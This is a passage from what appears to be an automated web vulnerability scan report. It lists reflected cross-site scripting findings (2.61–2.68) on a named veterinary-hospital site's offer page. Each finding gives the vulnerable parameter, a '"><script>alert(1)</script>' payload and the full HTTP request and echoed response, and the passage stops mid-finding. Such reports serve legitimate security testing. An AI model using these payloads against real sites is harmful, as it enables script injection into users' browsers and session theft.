X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=0rnbm532tpcf38n3r359evpem3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=c53f7"><script>alert(1)</script>b1eee91948e&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%
...[SNIP]...

2.61. http://www.vcahospitals.com/main/offer/ [formtype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the formtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b3af"><script>alert(1)</script>0e53c8134ea was submitted in the formtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP5b3af"><script>alert(1)</script>0e53c8134ea&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:21 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=793suj2hh05lka8bp2u1fr5153; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP5b3af"><script>alert(1)</script>0e53c8134ea&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%2
...[SNIP]...

2.62. http://www.vcahospitals.com/main/offer/ [guid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the guid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6319b"><script>alert(1)</script>4f2f2352eeb was submitted in the guid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC776319b"><script>alert(1)</script>4f2f2352eeb&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:10 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC776319b"><script>alert(1)</script>4f2f2352eeb&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.63. http://www.vcahospitals.com/main/offer/ [ipaddress parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the ipaddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5e17"><script>alert(1)</script>9ed82f767a0 was submitted in the ipaddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243d5e17"><script>alert(1)</script>9ed82f767a0&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:35 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ogu2vsddhd2jlpm5p5r0vhodr5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243d5e17"><script>alert(1)</script>9ed82f767a0&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP
...[SNIP]...

2.64. http://www.vcahospitals.com/main/offer/ [lname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5910"><script>alert(1)</script>83c5d7c83ea was submitted in the lname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=e5910"><script>alert(1)</script>83c5d7c83ea&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:50 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=isg82jqlearknsphgasmidgue5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=e5910"><script>alert(1)</script>83c5d7c83ea&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid
...[SNIP]...

2.65. http://www.vcahospitals.com/main/offer/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 541f7"><script>alert(1)</script>23387174e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F&541f7"><script>alert(1)</script>23387174e=1 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:22 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
m action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F&541f7"><script>alert(1)</script>23387174e=1" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.66. http://www.vcahospitals.com/main/offer/ [newmex parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the newmex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb26a"><script>alert(1)</script>f4e1c6835ca was submitted in the newmex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0bb26a"><script>alert(1)</script>f4e1c6835ca&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=km7obviolbecfv91k623peolv6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0bb26a"><script>alert(1)</script>f4e1c6835ca&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB19543
...[SNIP]...

2.67. http://www.vcahospitals.com/main/offer/ [optin parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e849"><script>alert(1)</script>730e752517f was submitted in the optin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&state=FL&optin=16e849"><script>alert(1)</script>730e752517f&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:04 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=16e849"><script>alert(1)</script>730e752517f&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.68. http://www.vcahospitals.com/main/offer/ [other parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the other request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c04"><script>alert(1)</script>eabbcd649dd was submitted in the other parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

